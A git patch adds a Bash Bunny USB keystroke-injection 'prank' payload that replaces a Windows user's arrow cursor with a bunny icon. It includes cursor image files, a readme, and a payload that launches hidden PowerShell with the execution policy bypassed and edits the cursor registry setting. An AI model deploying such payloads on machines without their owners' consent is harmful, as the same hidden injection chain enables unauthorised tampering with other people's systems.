From e1700bdc91859b3c0d9b9cd8d796715b6a83262b Mon Sep 17 00:00:00 2001 From: cribb-it <24548670+cribb-it@users.noreply.github.com> Date: Tue, 21 Dec 2021 23:31:08 +0000 Subject: [PATCH] New payload - Replace Cursor (#437) * New payload - Replace Cursor * Added Cursor - follow the white rabbit * Update Readme --- .../prank/Win_PoSH_ReplaceCursor/b.ani | Bin 0 -> 34462 bytes .../prank/Win_PoSH_ReplaceCursor/b.cur | Bin 0 -> 4286 bytes .../prank/Win_PoSH_ReplaceCursor/payload.txt | 20 ++++++++ .../prank/Win_PoSH_ReplaceCursor/ps.ps1 | 15 ++++++ .../prank/Win_PoSH_ReplaceCursor/readme.md | 47 ++++++++++++++++++ .../prank/Win_PoSH_ReplaceCursor/w.cur | Bin 0 -> 13942 bytes 6 files changed, 82 insertions(+) create mode 100644 payloads/library/prank/Win_PoSH_ReplaceCursor/b.ani create mode 100644 payloads/library/prank/Win_PoSH_ReplaceCursor/b.cur create mode 100644 payloads/library/prank/Win_PoSH_ReplaceCursor/payload.txt create mode 100644 payloads/library/prank/Win_PoSH_ReplaceCursor/ps.ps1 create mode 100644 payloads/library/prank/Win_PoSH_ReplaceCursor/readme.md create mode 100644 payloads/library/prank/Win_PoSH_ReplaceCursor/w.cur diff --git a/payloads/library/prank/Win_PoSH_ReplaceCursor/b.ani b/payloads/library/prank/Win_PoSH_ReplaceCursor/b.ani new file mode 100644 index 0000000000000000000000000000000000000000..606a1f86da22427b93bc097995bbe16eb7ba8bd6 GIT binary patch literal 34462 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 a1Xw>(9qRgx5?^0hbvTQ)FlV4&TKzwCdtnU# literal 0 HcmV?d00001 diff --git a/payloads/library/prank/Win_PoSH_ReplaceCursor/b.cur b/payloads/library/prank/Win_PoSH_ReplaceCursor/b.cur new file mode 100644 index 0000000000000000000000000000000000000000..be16abcf73c1d61fb6c2bc7ba1511e6a7452da42 GIT binary patch literal 4286 zcmeHJc}SdB5dU=3Sd8lxtXE{WYtdbg^}e;<@vbL`_kFBa5v*eWh$o(?wNa_oq-qNm z3$4L|X`yPNB-Bbn=mFgl*oM%?7UDLgjnS>Izqj=J_*_hO8^k|~18?8^X5O2bH}ji$ z%P_`_5hE5eptH>TmJIU(R#FTxMid65_+^+*$WG}r0;dr;jllms0*#H0K~Ygr;|U1~ zS4&GvD^K#iH8nN4E-o$_*d%nMr>B2#QuY@Y7tP$=-M3lWp`oGMZEbBf$7O$JW=2?5 zRh6HZnD|yqOw1Pn0Ri74&Ns8Nvfk|J>5*4dRMfGyU0q!@$U|&jU!P2^Rtu;PlarGc zDwRsR{x3c?H8n|-l9Jx`_4WOW)vr5?#p1n?kdTLzZ)Rpj3JVKggFmkV1Dn(q@{-rp z)s;`zhSJ#Bm_710Cy_|FeB!J&uTPs{`!o2vYHDgq^7HerWn^SrD=sb`HqN_@ThqJS@ z3c1Vj@$vbEG^&*kzZ*1i54V){pv$H?8w6r8aK|zS`(MeI%F5H{;^smeIF*fn62ET7SH~y}v@uZL!}^n}M~=?(S|G_8duw z^M#d_mFIPZOG`@v-1qg=)YKK&{si+@Zf@>v%t~`}b5c-Ha5W+#;x}VsVFH@xUETD1WMsrTCnsmt!NFk<@lNLNnVp>#A_j%vaXP8Z=;-M0QBSuh zANCGnV`INTY=1<3?I2&=UMlzS@Yro`Za$=!wE_N1z{6cue_&u>EtL%n3|QcfGdTN4 zSXkIja&qzw=>IM=GxHYaE!30Vnxi^_&pYky?GaSxQRL?4mIFTLFLd`J-e+--O+Now z*TDM^d3kx^y0(XghU^pyg&*wn^L2Z9dG!_*714gk`9#;~GX%0jJlYFzzc-{(=_O#h z9~fx?KGPZ+8d6Ye_gNh_Ha35jmzQ5g&3*~I{)D&av8}D`0W0UvkoTfrcky}D_S)JS z866!Z@R{==I5>DOK0f|Ba_)tk7lFN1^x4N$j<<6cV;??m;{BOo&*+=cJAbaM ztW0P1^5^yS^)u)zSI|Qj>HFQ<+IoR6r|X4!go15k4>4-XH&NO_3S8N6R>SaQA} zwWb(BydEK*U*n7$J$qb4{X$;fv$nQA(f854Y(bTS;7s5Zb?cN!70VFFbmLNp@s4**|_ AjsO4v literal 0 HcmV?d00001 diff --git a/payloads/library/prank/Win_PoSH_ReplaceCursor/payload.txt b/payloads/library/prank/Win_PoSH_ReplaceCursor/payload.txt new file mode 100644 index 00000000..9a823043 --- /dev/null +++ b/payloads/library/prank/Win_PoSH_ReplaceCursor/payload.txt @@ -0,0 +1,20 @@ +# Title: Replace Cursor +# Description: Replaces the standard arrow with a little bash bunny. +# Author: Cribbit +# Version: 1.0 +# Category: Pranks +# Target: Windows (Powershell 5.1+) +# Attackmodes: HID & STORAGE +# Extensions: Run + +LED SETUP + +GET SWITCH_POSITION + +ATTACKMODE HID STORAGE + +LED ATTACK + +RUN WIN "powershell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\ps.ps1')" + +LED FINNISH \ No newline at end of file diff --git a/payloads/library/prank/Win_PoSH_ReplaceCursor/ps.ps1 b/payloads/library/prank/Win_PoSH_ReplaceCursor/ps.ps1 new file mode 100644 index 00000000..25d4bff4 --- /dev/null +++ b/payloads/library/prank/Win_PoSH_ReplaceCursor/ps.ps1 @@ -0,0 +1,15 @@ +# Copies the bunny ani file to the users profile. +$p=(gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\b.ani' +$f= $Env:USERPROFILE+'\b.ani' +if (Test-Path $p) +{ + cp $p $f +} +else +{ + cp ($p -replace "1", "2") $f +} +# Set the registory value of Arrow to the new cursor +sp 'HKCU:Control Panel\Cursors' Arrow '%USERPROFILE%\b.ani'; +# Tell the system to update the displayed cursor +(Add-Type -Name c -Pass -M '[DllImport("user32.dll")] public static extern bool SystemParametersInfo(int A,int b,int c,int d);')::SystemParametersInfo(87,0,0,3) \ No newline at end of file diff --git a/payloads/library/prank/Win_PoSH_ReplaceCursor/readme.md b/payloads/library/prank/Win_PoSH_ReplaceCursor/readme.md new file mode 100644 index 00000000..fc080180 --- /dev/null +++ b/payloads/library/prank/Win_PoSH_ReplaceCursor/readme.md @@ -0,0 +1,47 @@ +# Replace Cursor +- Author: Cribbit +- Version: 1.0 +- Target: Windows 10 (Powershell 5.1+) +- Category: Pranks +- Attackmode: HID & Storage +- Extensions: Run +- Props: The Hak5 Team (Wallpaper changer & Eject USB sound) + +## Change Log +| Version | Changes | +| ------- | --------------- | +| 1.0 | Initial release | + +## Description +Replaces the standard arrow with a little bash bunny icon. + +## Notes +I have included a both a static and animated cursor. + +## Information about SystemParametersInfo +### Microsoft Doc: + +https://docs.microsoft.com/en-gb/windows/win32/api/winuser/nf-winuser-systemparametersinfoa + +### Flags + +``` +SPI_SETCURSORS = 0x0057; +``` + +Convert uint to int = 87; + +``` +SPIF_UPDATEINIFILE = 0x01; +SPIF_SENDCHANGE = 0x02; +``` + +Bitwise "OR" these two together (0x01 -bor 0x02) = 3; + + +## Colours +| Status | Colour | Description | +| ------ | ----------------------------- | --------------------------- | +| SETUP | Magenta solid | Setting attack mode | +| ATTACK | Yellow single blink | Injecting Powershell script | +| FINISH | Green blink followed by SOLID | Script is finished | \ No newline at end of file diff --git a/payloads/library/prank/Win_PoSH_ReplaceCursor/w.cur b/payloads/library/prank/Win_PoSH_ReplaceCursor/w.cur new file mode 100644 index 0000000000000000000000000000000000000000..b3661bf19fca2166b7a9108078bf3606d1fba06b GIT binary patch literal 13942 zcmeGi2~bp5@*_wnqv)<0%_i1Zi5DUU6qE#55X1pT4rK-;VFU&l6af>wMGnDrSv6=` zC~h=J0D&mTDPn4CYeEbtDgvtzJSPwZ!x51Cnz!Ab`QsOufJjJEMNjqg`~CWL_dEXk z@AZ2WH4c8WXHx*`RMHfRng=OeU3~rvl{A;43W2u(o@N7@0jkg`iV6Y#7>u>RSPP7` zz$mqVA=oh(C0hzJ)2Hi%TUzo6F!BKlHg4RC>Cu82V5qvSt&Je$n+>i4$K` zf%alQzhLB7plyVppwMyy1G^Y^_q|O0|7u_$x;hL`7H-Pp4 z9y%29n62yc&yPu=>_fmi2M!!4XXhzPuUci5ckbNzCMY8VoCY{3I6C?jrKF^`GCH3> ze@=pf|8XA*UX?*h0L=>y4jt5feSJOQ^XWQ2qNtgngBq3#sH(ml%ICYFogV?~ZEc;& zzI|c$7=L18+(-$tJv{2N-aLiO!*G1ZL@nS}MQ&SV!x^>rGAD``a z)~$0Y`1I3Vcfp5FwjE_@&~eMeWL+%k900U|cZVq}k$gv{PF)!TyzziN?d|PMmQvc? z-A!;zB6N0klDl`y;N4DF6g+!2w$|HwJNA)@y85zXmX;f`#NwS#y}UjnR#t1so;`tO zjPh^4{f;bN%#E2jb6G@e?73eUKGO8`jE;{#7T#dbd1!mlq7Ml659n`Sy3`1C`bY%= zpFD4G-y)`bT3SXs3%a}!r%uimt_@WNjhfuyQ zC@Ac{y}eTbBailvAOCk%V`FcZWBp4@%gCWaN2MVD4Dfzf*gqc#g>E-z&6wLr0QKa^kv~%(ePlxLeL*~XHm(l%zJN4nXy}AHIk};aH{#-w8n0aW z4}oth&R-=$;Z}m}s?<0u0(pOQL zcaXzb8lkE>=OED78a7SvNB?B&K
z zt%A-m7;AyC78q-Ru@)F>fw2}CYk{#A7;6D&0bF6u`jfSUnz6BKwxy*t?lUl^TfyTA zU=Qz*@F%Fpo35^(5r|*bGjVa;Z{S|u+M3>%|Dmhk;IQRpQc_9_`pkw!ix%fjCMK@mWM*Dg#G%pm#>VGl)ha%g(Lk9|1XCW*58u6xJ$pjR;jBUS^yyQ= zjz?g84&x;L{(DNDoP5#8mx4#~Gnt=&|Bgr$K=k!ZQHBN$jrrlm#v*vu8R0QCBh<}} zjtfdKHjHgJ6u^39W@gi8NsPRm9sm0K@2|nQSsUo;@$lG&{;N7WZ>s=WU~TPrm9EUl z{Aszk>>@m#{k4jUO2&m@(-S97SM&MXiHnQq7WPAa{tYsJz6j$c-BD4|HA3Ou=8@z9cC3wPELnV3snKJHpM&?8F}WJSnOAvo}Sq$5NyVNP#FRL^~}s{ z$X8#z99u_MAg0^l?;oIuA+y{YGzoFl_MV>pP0`fULJSSf(f8NBonmAp%mO`yOpKrH z6rKgGUr(O{KW6h^C*9iGhJH5!P6vD)nCjxb-@8zxMch2@)YE*Qw4lPABZ($_bKZ+}7q$aUG;+6~+Pl$4AP z(D6Om0V?5exTk;)8@^9y4#$s2J=N0EB}qvan&mdTY;0_YNl(whGdb*s z8+eYaa0n9J-9505?0|F0{^!?hxvZ?qGBdL^Xk#j%QczKOD|E+>K*jkY>cBI~4?i^S z=l{Zm4)LJq`RUVN)z#G0kp24)J%Z;VeSP}u?0ZOKUw;dD4bI9H_dnQv4JG~Mm$7wD zPCjUV(EAT>zBwZ_EiJpBS}0ouI1`WtF4wmpEbP!DJf~#?-Zx1|Na=v}NeBDx30vk> z(lFO|Iy%y8%gK!GU!z0uUsF>%+}YXn=BxNIm@J;#KY8+m6c?BD6UFt?!i9^m{c(L@ z2*?BUQd6@yWo*1Q3D%;`o}Sy_Jk|rW76n*MMVY4$hg$Q{#G*ippWq%&-4}ZIFpYwH8rzy#flAN!v?pT z5fLYzSXglL*!h@lXlSMF^qpfd566&HDkboJ!#e?$+S&$K$Nc#C3oWNkMb{V^(d%QJ zhf7$9-%OdgxfKzKc9AJlcnN-f+ZFdqP%i?=F#f~+1Adab`=;9u9=y0hCf|?d+uCl! zvGL5x%I@0g)%MqFYwLOy4C5c$A9UrqxNIlm#?f~Oa9^Sch<6DXd>7K}{R+MxFRiVx zZ{+bV$m#{u2m7>ExX)1_mHw#k4%eSMcI+zysq!O7PSv!wwnLw0bsar=@`*y|6%+Dz z=9ZZmy{}MXd{9Dhj;*PztRxJ=eWDJLXgBu30Px-cH@97w_iX?E@P{~tZr&^;h%krZ z-HbeU_dprkuPM23;l-V_SF8dp9vvND@8Uv#2L|xt1xruQA=bxd4+#qkBOV?*2*ew4 zKQ-9=`xeLu$B(y9FfjNyS4YP=m!g(O0PjP&=82}JJbM0lRp0R*9ljUPw{$$k*w~{$ zu5+}>G+o_~aR2+OcW|PjVsMXxdlWjB<>KN=Hf{`%O`62VeFh!R8g0i}_B6%ffbQVn zgAWFouVD_R<4*&{5?ShgpX595SVS5dbD>?g6yf`c`w}*^wY9^&vPDYXx!=cUC06ZM zuJkHcyOzH1`3uP0v9;x2M})Lw;>5WJm6ZDj8b;@HNB8Gx{Bj Slz